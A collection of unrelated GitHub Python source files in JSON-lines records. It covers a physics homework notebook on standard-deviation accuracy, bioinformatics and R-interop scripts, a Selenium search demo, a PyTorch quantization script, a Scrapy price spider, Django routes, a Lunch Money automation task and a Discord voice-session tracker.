ddof = 1)\nprint('Real solution = ', a_sol)\n\n\n# In[10]:\n\n\n#Compute standard deviation of sequence a with method 1, method 2 and real value (numpy.std())\nb_eq1 = eq1(b)\nb_eq2 = eq2(b)\nb_sol = np.std(b, ddof = 1)\nprint('Real solution = ', b_sol)\n\n\n# In[11]:\n\n\n#Determine relative error for sequence a method 1 and method 2 wrt. real value (numpy.std())\na_sol1_err = relative_error(float(a_eq1),a_sol)\na_sol2_err = relative_error(float(a_eq2),a_sol)\n\n#Determine which method is more accurate (smaller error) for sequence a\nif a_sol1_err < a_sol2_err: print('Method 1 is more accurate for sigma(a)')\nelse:\n print('Method 1 is more accurate for simga(a)')\n\n\n# In[12]:\n\n\n#Determine relative error for sequence b method 1 and method 2 wrt. real value (numpy.std())\nb_sol1_err = relative_error(float(b_eq1),b_sol)\nb_sol2_err = relative_error(float(b_eq2),b_sol)\n\n#Determine which method is more accurate (smaller error) for sequence b\nif b_sol1_err < b_sol2_err: print('Method 1 is more accurate for sigma(b)')\nelse:\n print('Method 1 is more accurate for sigma(b)')\n\n\n# In[13]:\n\n\n#note that the sequence with smaller mean optimized performace of single pass method \n\n#Q1(d) Pseudocode \n#i. Define Method 2 function for eq. 2 sigma = sqrt((1/(n-1))Σx_i^2-n*x_bar^2) \n #with i shifted negatively by first index of the data set - this is \n #done to try to shift the mean to zero while maintaining the original\n #determine the more accurate method standard deviation.\n#ii. Compute with sequence a and b\n#iii. Determine relative error of revised eq2 wrt. numpy.std() function and\n #determine (smallest error) \n#iv. Compare results to original method 2.\n\n\n# In[16]:\n\n\ndef eq2_revised(dataset):\n \"\"\" Determines the standard deviation with a single pass method.\n\n Determines the standard deviation with a single pass method with the following equation\\\n sigma = sqrt((1/(n-1))Σx_i^2-n*x_bar^2).\n Parameters\n --------\n dataset : array\n dataset is any given array of numbers.\n\n Returns\n -------\n sigma : float\n Standard deviation of the dataset.\n \"\"\"\n n = len(dataset)\n for i in dataset:\n x = i-dataset[0]\n std_sqd = (1/(n-1))*np.sum(x**2-n*(x/n)**2)\n if std_sqd < 0:\n return 'Negative squareroot object - imaginary standard deviation'\n else: \n sigma = np.sqrt(std_sqd)\n print('Revised Method 2 solution = ', sigma)\n return sigma\n\n\n# In[17]:\n\n\na_eq2_rev = eq2_revised(a)\na_sol2_rev_err = relative_error(float(a_eq2_rev),b_sol)\n\n\n# In[18]:\n\n\n#Determine which method is more accurate (smaller error)\nif a_sol2_rev_err < a_sol2_err: print('Revised Method 2 is more accurate than Method 2')\nif a_sol2_rev_err < a_sol1_err : print('Revised Method 2 is more accurate than Method 1')\nelse: print('Method 1 is more accurate than Revised Method 2')\n\n\n# In[19]:\n\n\nb_eq2_rev = eq2_revised(b)\nb_sol2_rev_err = relative_error(float(b_eq2_rev),b_sol)\n\n\n# In[20]:\n\n\n#Determine which method is more accurate (smaller error)\nif b_sol2_rev_err < b_sol2_err: print('Revised Method 2 is more accurate than Method 2')\nif b_sol2_rev_err < b_sol1_err : print('Revised Method 2 is more accurate than Method 1')\nelse: print('Method 1 is more accurate than Revised Method 2')\n\n\n# In[21]:\n\n\neq2_rev = eq2_revised(data)\nsol2_rev_err = relative_error(float(eq2_rev),sol)\n\n\n# In[23]:\n\n\n#Determine which method is more accurate (smaller error)\nif sol2_rev_err < sol_eq2_err: print('Revised Method 2 is more accurate than Method 2')\nif sol2_rev_err < sol_eq1_err : print('Revised Method 2 is more accurate than Method 1')\nelse: print('Method 1 is more accurate than Revised Method 2')\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"milica-i/PHY407","sub_path":"L02_q1.py","file_name":"L02_q1.py","file_ext":"py","file_size_in_byte":7519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29790413758","text":"import subprocess\nimport sys\n\ndef run_executable(executable_path):\n while True:\n process = subprocess.Popen(executable_path, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n stdout, stderr = process.communicate()\n\n print(\"Output:\\n\", stdout.decode())\n\n if \"connect host 0.0.0.0:9999\" in stdout.decode():\n break\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print(\"Usage: python script.py \")\n sys.exit(1)\n\n executable_path = sys.argv[1]\n run_executable(executable_path)\n","repo_name":"nnyilun/Seedcup_2023","sub_path":"bin/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18351231889","text":"# Author: Samuel Brady\n\n# Gets the pattern of samples in which a mutation is present; this\n# assumes that the first sample is germline, so only subsequent samples are analyzed \n\nimport sys\nfrom operator import itemgetter\n\ninFile = sys.argv[1]\nvafThresh = float(sys.argv[2]) # minimum VAF to be considered present, i.e. 0.05\noutFile = sys.argv[3]\n\n# go through input file, get change pattern, and add change pattern to outMatrix, which has all previous info plus one new column with change pattern\ninputFile = open(inFile)\noutMatrix = []\n\nheader = inputFile.readline().rstrip(\"\\n\").split(\"\\t\")\nheader.append(\"SamplesWithMutation\") # add new column with change pattern\n\noutMatrix.append(header)\n\nrefIndex = header.index(\"Ref\") # this minus 1 is the last sample column, which helps us know where the sample columns end\n\nfor line in inputFile:\n\tlineList = line.rstrip(\"\\n\").split(\"\\t\")\n\n\tsamplesWithMutation = \"Samples:\"\n\n\tinAllSamples = True\n\thasNA = False\n\n\t# go through each sample in order and add information about what samples have this mutation\n\tfor colIndex in range(2, refIndex):\n\t\tthisVaf = lineList[colIndex]\n\n\t\tif thisVaf == \"NA\": # if the VAF is NA, label the whole row has having an NA\n\t\t\thasNA = True \n\t\t\tbreak\n\t\telse:\n\t\t\tthisVaf = float(thisVaf)\n\n\t\tif thisVaf >= vafThresh:\n\t\t\tsamplesWithMutation += str(colIndex - 1) + \"-\" # make a string of the form \"2-4-5\" where each number indicates a sample with the mutation\n\t\telse:\n\t\t\tinAllSamples = False\n\t\t\n\tif inAllSamples:\n\t\tsamplesWithMutation = \"Samples:All\" # label mutations present in all samples as present in all\n\n\tif samplesWithMutation.endswith(\"-\"):\n\t\tsamplesWithMutation = samplesWithMutation[:-1] # get rid of trailing hyphen\n\n\tif hasNA:\n\t\tsamplesWithMutation = \"Samples:NoCoverage\"\n\n\tif samplesWithMutation == \"Samples:\":\n\t\tsamplesWithMutation = \"Samples:None\"\n\n\tlineList.append(samplesWithMutation)\n\n\toutMatrix.append(lineList)\n\ninputFile.close()\n\n# sort by last column (\"SamplesWithMutation\")\noutMatrix = sorted(outMatrix, key = itemgetter(header.index(\"SamplesWithMutation\"), header.index(\"Effect\"), header.index(\"SangerGene?\")))\n\nheader = outMatrix.pop()\noutMatrix.insert(0, header)\n\n# output to file\noutputFile = open(outFile, \"w\")\n\nfor line in outMatrix:\n\toutputFile.write(\"\\t\".join(line) + \"\\n\")\n\noutputFile.close()\n\n","repo_name":"samuelwb/cancer-evolution","sub_path":"SnvWgs/ChangePattern.py","file_name":"ChangePattern.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"42839560724","text":"#与百度首页交互\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\n\noption = webdriver.ChromeOptions()\n#option.add_argument('headless')\n\n#要换成适应自己操作系统的chromedriver\ndriver = webdriver.Chrome(\n executable_path='H:/workspace/软件/chromedriver_win32/chromedriver',\n chrome_options=option\n)\n\nurl = 'https://www.baidu.com'\n\ndriver.get(url)\n\n#打印当前页面标题\nprint(driver.title)\n#在搜索框中输入文字\ntimeout = 5\nsearch_content = WebDriverWait(driver, timeout).until(\n lambda d:d.find_element_by_xpath('//input[@id=\"kw\"]')\n)\nsearch_content.send_keys('python')\n#模拟点击\"百度一下\"\nsearch_button = WebDriverWait(driver, timeout).until(\n lambda d: d.find_element_by_xpath('//input[@id=\"su\"]')\n)\nsearch_button.click()\n\n#打印搜索结果\nsearch_results = WebDriverWait(driver, timeout).until(\n lambda d: d.find_elements_by_xpath('//h3[contains(@class,\"t\")]')\n)\nfor item in search_results:\n print(item.text)\n\ndriver.close()","repo_name":"chengzhihui007/python_test","sub_path":"day10/case01.py","file_name":"case01.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3628073540","text":"import numpy as np\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.utils.validation import check_array, check_is_fitted\nimport rpy2.robjects as ro\nimport rpy2.robjects.numpy2ri\nimport warnings\nfrom rpy2.rinterface import RRuntimeWarning\n\nclass MNN(BaseEstimator, TransformerMixin):\n \n def __init__(self, n_components=10, learn_V=True):\n self.n_components = n_components\n self.learn_V = learn_V\n warnings.filterwarnings(\"ignore\", category=RRuntimeWarning)\n rpy2.robjects.numpy2ri.activate()\n ro.r[\"library\"](\"scran\")\n ro.r[\"library\"](\"BiocParallel\")\n ro.r[\"library\"](\"scRNAseq\")\n ro.r[\"library\"](\"matrixStats\")\n ro.r[\"library\"](\"magrittr\")\n ro.r[\"library\"](\"ggplot2\")\n ro.r[\"library\"](\"biomaRt\")\n ro.r[\"library\"](\"tibble\")\n ro.r[\"library\"](\"SIMLR\")\n ro.r(\"BiocParallel::register(BiocParallel::MulticoreParam(4))\")\n \n def fit_transform(self, X, batch, list_b):\n\n index_0 = np.where(batch == list_b[0])[0]\n index_1 = np.where(batch == list_b[1])[0]\n \n self.A_ = np.log(1 + X[index_0].T)\n self.B_ = np.log(1 + X[index_1].T)\n \n \n nr,nc = self.A_.shape\n Ar = ro.r.matrix(self.A_, nrow=nr, ncol=nc)\n ro.r.assign(\"matrix_A\", Ar)\n \n nr,nc = self.B_.shape\n Br = ro.r.matrix(self.B_, nrow=nr, ncol=nc)\n ro.r.assign(\"matrix_B\", Br)\n \n ro.r(\"out <- mnnCorrect(matrix_A, matrix_B, BPPARAM=MulticoreParam(4))\")\n \n corr_A = np.array(ro.r(\"out$corrected\")[0]).T\n corr_B = np.array(ro.r(\"out$corrected\")[1]).T\n \n \n arr = np.zeros_like(X, dtype=np.float)\n arr[index_0] = corr_A\n arr[index_1] = corr_B \n\n return arr","repo_name":"romain-lopez/scVI-reproducibility","sub_path":"R_interop/MNNs.py","file_name":"MNNs.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"32"} +{"seq_id":"9946501650","text":"class Solution:\n def findSubsequences(self, nums: List[int]) -> List[List[int]]:\n answer = []\n def backtrack(index, comb):\n if len(comb) >= 2:\n answer.append(comb.copy())\n \n for i in range(index, len(nums)):\n if len(comb) == 0 or comb[-1] <= nums[i]:\n comb.append(nums[i])\n backtrack(i + 1, comb)\n comb.pop()\n \n backtrack(0, [])\n output = Counter([tuple(i) for i in answer])\n return [list(key) for key in output]\n \n","repo_name":"Gizaw-Agodo/A2sV","sub_path":"0491-non-decreasing-subsequences/0491-non-decreasing-subsequences.py","file_name":"0491-non-decreasing-subsequences.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"30257451649","text":"from datetime import datetime, timedelta\nfrom typing import Iterable, List\nfrom decimal import Decimal\nimport dateparser\nimport math\nfrom opentelemetry.trace import Status, StatusCode\n\nfrom .task import Task\nfrom .utils import Account, Category, Transaction, call_lunchmoney, parse_date\n\n\nclass LinkSpareChangeTask(Task):\n def __init__(\n self,\n main_account: str,\n savings_account: str,\n multiplier: int = 1,\n ignore_categories: List[str] = [\"Transfers\"],\n max_offset_days: int = 1,\n ) -> None:\n super().__init__()\n\n now = datetime.utcnow().date()\n\n self.start_date = (now - timedelta(days=30)).isoformat()\n self.end_date = now.isoformat()\n\n self.main_account = main_account\n self.savings_account = savings_account\n\n self.multiplier = multiplier\n self.ignore_categories = ignore_categories\n\n self.max_offset_days = max_offset_days\n\n def run(self):\n with self.tracer.start_as_current_span(\"link_spare_change\"):\n with self.tracer.start_as_current_span(\"lunchmoney.accounts\"):\n accounts = [\n *(\n Account(\"asset\", **asset)\n for asset in call_lunchmoney(\"GET\", \"/v1/assets\")[\"assets\"]\n ),\n *(\n Account(\"plaid_account\", **asset)\n for asset in call_lunchmoney(\"GET\", \"/v1/plaid_accounts\")[\n \"plaid_accounts\"\n ]\n ),\n ]\n\n self.log.debug(f\"{len(accounts)} accounts loaded from Lunch Money\")\n for account in accounts:\n self.log.debug(\" - %s %s\", account.alias, f\"({account.id})\")\n\n with self.tracer.start_as_current_span(\"lunchmoney.categories\"):\n categories = [\n Category(**cat)\n for cat in call_lunchmoney(\"GET\", \"/v1/categories\")[\"categories\"]\n ]\n\n self.log.debug(f\"{len(categories)} categories loaded from Lunch Money\")\n ignore_categories = list(\n cat for cat in categories if cat.name in self.ignore_categories\n )\n ignored_category_ids = [c.id for c in ignore_categories]\n for cat in categories:\n self.log.debug(f\"{cat.name} ({cat.id}, ignored:{cat in ignore_categories})\")\n\n main_account = next(a for a in accounts if a.alias == self.main_account)\n savings_account = next(a for a in accounts if a.alias == self.savings_account)\n\n with self.tracer.start_as_current_span(\"lunchmoney.transactions\", attributes={\"account\": main_account.name}):\n main_transactions = [\n Transaction(**cat)\n for cat in call_lunchmoney(\n \"GET\",\n \"/v1/transactions\",\n params={\n f\"{main_account.kind}_id\": main_account.id,\n \"start_date\": self.start_date,\n \"end_date\": self.end_date,\n \"is_group\": \"false\",\n },\n )[\"transactions\"]\n ]\n\n self.log.debug(\n f\"{len(main_transactions)} transactions loaded from Lunch Money for {main_account.alias}\"\n )\n main_transactions = list(\n filter(\n lambda t: t.category_id not in ignored_category_ids, main_transactions\n )\n )\n self.log.debug(\n f\"{len(main_transactions)} transactions in {main_account.alias} account which aren't in the ignored categories\"\n )\n\n with self.tracer.start_as_current_span(\"lunchmoney.transactions\", attributes={\"account\": savings_account.name}):\n savings_transactions = [\n Transaction(**cat)\n for cat in call_lunchmoney(\n \"GET\",\n \"/v1/transactions\",\n params={\n f\"{savings_account.kind}_id\": savings_account.id,\n \"start_date\": self.start_date,\n \"end_date\": self.end_date,\n \"is_group\": \"false\",\n },\n )[\"transactions\"]\n ]\n\n self.log.debug(\n f\"{len(savings_transactions)} transactions loaded from Lunch Money for {savings_account.alias}\"\n )\n\n for t in main_transactions:\n if t.group_id is not None:\n # Don't attempt to group transactions which are already grouped\n self.log.debug(f\"Skipping {t} because it is already grouped\")\n continue\n\n if t.status == \"recurring\":\n # We can't group recurring transactions\n self.log.debug(\n f\"Skipping {t} because it is part of a recurring transaction (which can't be grouped)\"\n )\n continue\n\n amt = Decimal(t.amount)\n if amt < 0:\n # Ignore incoming transactions since they don't generate spare change\n self.log.debug(\n f\"Skipping {t} because it is an inbound transfer which doesn't generate spare change\"\n )\n continue\n\n with self.tracer.start_as_current_span(\"link_spare_change\", attributes={\"transaction\": t.id}) as span:\n spare_change = -self.multiplier * (\n (math.ceil(abs(amt)) - abs(amt)) or Decimal(1)\n )\n self.log.debug(f\"{t} (spare change: {spare_change})\")\n\n date_candidates = list(\n filter(\n lambda c: abs(parse_date(c.date) - parse_date(t.date))\n < timedelta(days=self.max_offset_days),\n savings_transactions,\n )\n )\n value_candidates = list(\n filter(lambda c: Decimal(c.amount) == spare_change, date_candidates)\n )\n\n st = next((c for c in value_candidates), None)\n if not st:\n self.log.info(\n f\"Skipping {t} because no spare matching change transactions were found (in date range:{len(date_candidates)}, +amount:{len(value_candidates)})\"\n )\n span.set_status(Status(StatusCode.ERROR, \"No matching change transactions found\"))\n continue\n\n self.log.debug(\"%s ---> %s\", t, st)\n savings_transactions.remove(st)\n\n transactions = set([t.id, st.id])\n\n if st.group_id is not None:\n with self.tracer.start_as_current_span(\"lunchmoney.ungroup\"):\n old_group = call_lunchmoney(\n \"DELETE\", f\"/v1/transactions/group/{st.group_id}\"\n )[\"transactions\"]\n transactions = transactions.union(old_group)\n self.log.debug(f\"Split old group containing {old_group}\")\n\n with self.tracer.start_as_current_span(\"lunchmoney.group\", attributes={\"name\": t.payee, \"transactions\": list(transactions)}):\n new_group = call_lunchmoney(\n \"POST\",\n \"/v1/transactions/group\",\n json={\n \"date\": t.date,\n \"payee\": t.payee,\n \"category_id\": t.category_id,\n \"notes\": t.notes,\n \"tags\": [tag.id for tag in t.tags],\n \"transactions\": list(transactions),\n },\n )\n self.log.info(\n f\"Completed {t} by forming new group {new_group} with transactions {list(transactions)}\"\n )\n\n","repo_name":"SierraSoftworks/lunchmoney-automate","sub_path":"lunchmoney_automate/link_spare_change.py","file_name":"link_spare_change.py","file_ext":"py","file_size_in_byte":8423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42930253981","text":"\nfrom tkinter.tix import TEXT\nimport requests\nfrom store import store\n\nTEXT = \"What item does you want to buy?: \"\nmoney = 1000\n\n\ndef price_of_furniture(furniture):\n\n res = requests.get(f'http://localhost:8000/name/?name={furniture}')\n return (res.json()[\"price\"])\n\n\ndef buy_furniture(furniture, money):\n price = price_of_furniture(furniture)\n if (price is not None):\n int(price)\n if (price > money):\n print(\"You should get a job.\")\n else:\n res = requests.get(f'http://localhost:8000/buy/?name={furniture}')\n money -= price\n return res.json()[\"inventory\"]\n\n\ntxt = input(TEXT)\nprice = price_of_furniture(txt)\nas_to_buy = buy_furniture(txt, money)\n\n\nif (price != None):\n if as_to_buy != None:\n print(\n f\"Congratulations, you've just bought {txt} for {price}. There are {as_to_buy} left now in the store.\")\n\nelse:\n print(f\"There is no {txt} in the store to buy\")\n","repo_name":"edengil/tutorial","sub_path":"exercises/‏‏Week-6/Day-1/fast_API/exercises/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39390267953","text":"'''\nCreated on Aug 16, 2020\n\n@author: patch\n'''\n# -*- coding:utf-8 -*-\n\nfrom django.conf.urls import include, url\nfrom Teacher.views import *\n\nurlpatterns = [\n\n # reg\n url(r'^editClass$', editClass,name='editClass'),\n url(r'^api_editClass$',api_editClass,name='api_editClass'),\n url(r'^lessonPlan$',lessonPlan,name='lessonPlan'),\n url(r'^lessonCheckin$',lessonCheckin,name='lessonCheckin'),\n url(r'^api_lessonCheckin$',api_lessonCheckin,name='api_lessonCheckin'),\n url(r'^courseList$', courseList,name='courseList'),\n url(r'^courseEdit$', courseEdit,name='courseEdit'),\n url(r'^api_courseEdit$',api_courseEdit,name='api_courseEdit'),\n url(r'^userCoursePlan$', userCoursePlan,name='userCoursePlan'),\n url(r'^userLessonSkill$', userLessonSkill,name='userLessonSkill'),\n url(r'^api_deleteLesson$',api_deleteLesson,name='api_deleteLesson'),\n url(r'^horse$', horse,name='horse'),\n url(r'^swipe$', swipe,name='swipe'),\n\n ]\napp_name = 'Teacher'\n","repo_name":"patchli214/patchclass","sub_path":"Teacher/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33574482493","text":"import torch\nimport torchvision.models as models\nfrom data_loader import get_imagenet\nimport torch.quantization\nfrom resent_qunt import ResNet,Bottleneck,fuse_model\nimport warnings\nimport os \nfrom tqdm import tqdm\n\ntorch.manual_seed(191009)\n\n\nwarnings.filterwarnings(\n action='ignore',\n category=DeprecationWarning,\n module=r'.*'\n)\nwarnings.filterwarnings(\n action='default',\n module=r'torch.quantization'\n)\nwarnings.simplefilter(\"ignore\", UserWarning)\n\n\n \nclass quantizePytorchModel(object):\n \"\"\"docstring for quantizePytorchModel\"\"\"\n def __init__(self):\n super(quantizePytorchModel, self).__init__()\n self.device = torch.device(\"cpu\" if torch.cuda.is_available() else \"cpu\")\n self.train_loader, self.test_loader = get_imagenet()\n self.quant()\n\n def quant(self):\n\n model = self.load_model()\n model.eval()\n self.print_size_of_model(model)\n self.validate(model,\"original_resnet50\",self.test_loader)\n \n fmodel = fuse_model(model)\n self.print_size_of_model(fmodel)\n self.validate(fmodel,\"fused_resnet50\",self.test_loader)\n\n pcqmodel = self.quantize(fmodel)\n print(\"size of quantization per channel model\")\n self.print_size_of_model(pcqmodel)\n torch.jit.save(torch.jit.script(pcqmodel),\"quantization_per_channel_model.pth\")\n torch.save(pcqmodel.state_dict(),\"quantization_per_channel_model_state_dict.pth\")\n print(pcqmodel)\n \n def load_model(self):\n model = ResNet(Bottleneck, [3, 4, 6, 3])\n state_dict = torch.load(\"resnet50-19c8e357.pth\")\n model.load_state_dict(state_dict)\n model.to(self.device)\n return model\n\n def print_size_of_model(self,model):\n torch.save(model.state_dict(), \"temp.p\")\n print('Size (MB):', os.path.getsize(\"temp.p\")/1e6)\n os.remove('temp.p')\n\n\n def validate(self,model,name,data_loader,isCalibration=False):\n with torch.no_grad():\n correct = 0\n total = 0\n acc = 0\n for Images, Labels in data_loader:\n images = Images[0].to(self.device)\n labels = Images[1].to(self.device)\n outputs = model(images)\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n # print(total)\n if total == 1024:#and isCalibration:\n break\n acc = 100 * correct / total\n print('{{\"metric\": \"{}_val_accuracy\", \"value\": {}}}'.format(name, acc))\n return acc\n\n def quantize(self,model):\n\n # model.qconfig = torch.quantization.default_qconfig\n # pmodel = torch.quantization.prepare(model)\n # print(\"calibration\")\n # self.validate(pmodel,\"quntize_per_tensor_resent50\",self.train_loader)\n # qmodel = torch.quantization.convert(pmodel)\n # print(\"after quantization\")\n # self.validate(qmodel,\"quntize_per_tensor_resent50\",self.test_loader)\n \n model.qconfig = torch.quantization.get_default_qconfig('fbgemm')\n pcpmodel = torch.quantization.prepare(model)\n print(\"calibration\")\n self.validate(pcpmodel,\"quntize_per_channel_resent50\",self.train_loader)\n pcqmodel = torch.quantization.convert(pcpmodel)\n print(\"after quantization\")\n self.validate(pcqmodel,\"quntize_per_channel_resent50\",self.test_loader)\n return pcqmodel\n\n def experiments_quntized_model(self):\n model = torch.jit.load(\"quantization_per_channel_model.pth\")\n model.eval()\n print((model.conv1))\n # orig_model = ResNet(Bottleneck, [3, 4, 6, 3])\n # fused_model = fuse_model(orig_model)\n # print(fused_model)\n # fused_model.load_state_dict(torch.load(\"quantization_per_channel_model_state_dict.pth\"))\n # self.validate(fused_model,\"quntized_per_tensor\",self.test_loader)\n \n\n\n\n\ndef main():\n qPm = quantizePytorchModel()\n # qPm.experiments_quntized_model()\n\nif __name__ == '__main__':\n main()","repo_name":"tiru1930/resnet_quantization","sub_path":"quntize.py","file_name":"quntize.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"21236614657","text":"#!/usr/bin/python3\nif (__name__ == \"__main__\"):\n from sys import argv\n import calculator_1 as calc\n len_a = len(argv)\n if (len_a != 4):\n print(\"Usage: ./100-my_calculator.py \")\n exit(1)\n a = int(argv[1])\n operator = argv[2]\n b = int(argv[3])\n ops_str = \"+-*/\"\n if operator not in ops_str:\n print(\"Unknown operator. Available operators: +, -, * and /\")\n exit(1)\n if (operator == ops_str[0]):\n res = calc.add(a, b)\n print(\"{} + {} = {}\".format(a, b, res))\n elif (operator == ops_str[1]):\n res = calc.sub(a, b)\n print(\"{} - {} = {}\".format(a, b, res))\n elif (operator == ops_str[2]):\n res = calc.mul(a, b)\n print(\"{} * {} = {}\".format(a, b, res))\n else:\n res = calc.div(a, b)\n print(\"{} / {} = {}\".format(a, b, res))\n","repo_name":"sale-alxsoft/alx-higher_level_programming","sub_path":"0x02-python-import_modules/100-my_calculator.py","file_name":"100-my_calculator.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25638170200","text":"class Solution:\n def solve(self, board: List[List[str]]) -> None:\n \"\"\"\n Do not return anything, modify board in-place instead.\n \"\"\"\n directions = [(1,0),(0,1),(-1,0),(0,-1)]\n result = []\n\n def checker(row,col):\n if (0 <= col < len(board[0])) and (0 <= row < len(board)): \n return True\n return False\n b = False\n visited = set()\n\n def inBorder(row,col):\n if row == 0 or row == len(board) - 1 or col == 0 or col == len(board[0]) - 1:\n return True\n return False\n\n def dfs(row,col):\n nonlocal b\n if not checker(row,col) or board[row][col] == \"X\" or (row,col) in visited:\n return [True,[]]\n \n if inBorder(row,col):\n return [False,[]]\n visited.add((row,col))\n temp = []\n r = True\n for i,j in directions: \n res = dfs(row+i,col+j)\n temp.extend(res[1])\n r = r and res[0] \n temp.append((row,col))\n return [r,temp]\n\n for i in range(len(board)):\n for j in range(len(board[0])):\n if board[i][j] == \"O\" and (i,j) not in visited:\n ans = dfs(i,j)\n if ans[0]:\n result.extend(ans[1])\n\n for row,col in result:\n board[row][col] = \"X\"","repo_name":"natiyeshi/A2SVproblems","sub_path":"surrounded-regions.py","file_name":"surrounded-regions.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23541777695","text":"import scrapy\n\nclass PriceSpider(scrapy.Spider):\n name = \"getPrice\"\n\n def start_requests(self):\n urls = [\n 'https://eshop-prices.com/prices?currency=CNY'\n ]\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n \n def parse(self, response):\n \n allgameSelector = response.xpath(\"/html[1]/body[1]/div[1]/table[1]/tbody[1]/tr\")\n# gameRegionSelector = response.xpath(\"/html[1]/body[1]/div[1]/table[1]/thead[1]/tr[1]/th\")\n \n for gameSelector in allgameSelector:\n \n name = gameSelector.xpath(\"th[1]/a[1]/text()\").extract()\n \n priceSelector = gameSelector.xpath(\"td\")\n price = []\n for areaPrice in priceSelector:\n price.append(areaPrice.xpath(\"text()\").extract()[0])\n\n yield {\n 'name' : name,\n 'price' : price,\n }\n \n# skipFirst = True\n# regionHead = []\n# for region in gameRegionSelector:\n# if (skipFirst):\n# skipFirst = False\n# continue\n# regionHead.append(region.xpath(\"@title\").extract())\n# yield {'regions':regionHead}","repo_name":"PeneTraTor111/gnow","sub_path":"price_data/price/spiders/price_spider.py","file_name":"price_spider.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9929936717","text":"from django import template\nfrom core.models import Order\n\nregister = template.Library()\n\n@register.filter\ndef cart_item_count(user):\n\tif user.is_authenticated:\n\t\tqs = Order.objects.filter(user=user,ordered=False)\n\t\tif qs.exists():\n\t\t\treturn qs[0].items.count()\n\treturn 0\n\n@register.filter\ndef seller_order_count(user):\n if user.laundry:\n qs = Order.objects.filter(laundry=user.laundry, ordered=False)\n if qs.exists():\n return qs.count()\n return 0\n\n\n@register.filter\ndef seller_revenue(user):\n if user.laundry:\n qs = Order.objects.filter(laundry=user.laundry, ordered=False)\n if qs.exists():\n total = 0\n for item in qs:\n total += item.get_total()\n return total\n return 0\n","repo_name":"ishvinder-singh/Washify","sub_path":"core/templatetags/cart_template_tags.py","file_name":"cart_template_tags.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25332680344","text":"import time\nimport discord\nfrom Presence.playtime import today\nfrom Voice.VoiceActivity import VoiceActivity, VOICE_SESSIONS\nfrom misc.misc import determine_htable_key, locate_htable_obj, time_elapsed\nfrom Database.GuildObjects import MikoMember\nfrom tunables import *\ndb = AsyncDatabase(\"Voice.track_voice.py\")\n\nasync def fetch_voicetime_sessions(client: discord.Client):\n \n sel_cmd = \"SELECT value FROM PERSISTENT_VALUES WHERE variable='GLOBAL_REBOOT_TIME_ACTIVITY'\"\n end_time = await db.execute(sel_cmd)\n if end_time is None:\n sel_cmd = \"SELECT end_time FROM VOICE_HISTORY WHERE end_time is not NULL ORDER BY end_time DESC LIMIT 1\"\n end_time = await db.execute(sel_cmd)\n \n if end_time is None or end_time == []:\n print(\"Could not fetch a time to restore any voicetime sessions.\")\n return\n \n sel_cmd = (\n \"SELECT user_id, start_time, server_id FROM VOICE_HISTORY \"\n f\"WHERE end_time={end_time}\"\n )\n val = list(await db.execute(sel_cmd))\n \n rst = 0\n t = int(time.time()) - tunables('THRESHOLD_RESUME_REBOOT_VOICE_ACTIVITY')\n async def restore(member: discord.Member, restore=True):\n u = MikoMember(user=member, client=client)\n key = determine_htable_key(map=VOICE_SESSIONS, key=member.id)\n va = VoiceActivity(u=u, start_time=t if restore else None)\n await va.ainit()\n VOICE_SESSIONS[key] = va\n return\n \n # Not very fast, but only way to achieve voice session restoration\n for guild in client.guilds:\n if val == []: break\n for member in guild.members:\n if val == []: break\n if val != [] and any(str(member.id) in sl for sl in val) and member.voice is not None:\n \n\n # Find which iteration of val the member.id was matched to\n outer = 0\n found = False\n for i, entry in enumerate(val):\n for user in entry:\n if user == str(member.id):\n found = True\n break\n if found:\n outer = i\n break\n\n\n # If the current guild id is equal to the database entry, continue\n if str(val[outer][2]) == str(guild.id):\n \n #if val[outer][1] >= t:\n await restore(member=member)\n print(f\"> Restored {member}'s voice session\")\n rst += 1\n else:\n await restore(member=member, restore=False)\n print(f\"> {member} switched guilds during restart, created a new voice session for them\")\n\n \n del val[outer] # Done processing this user, delete from memory\n\n if rst > 0:\n print(f\"Restored {rst} voice sessions.\")\n print(\"Voice session restoration complete.\")\n else: print(\"No voice sessions were restored.\")\n \n print(\"Restore complete\")\n return\n\n# Responsible for calculating total voicetime in a search result\ndef total_voicetime_result(result):\n voicetime = 0\n 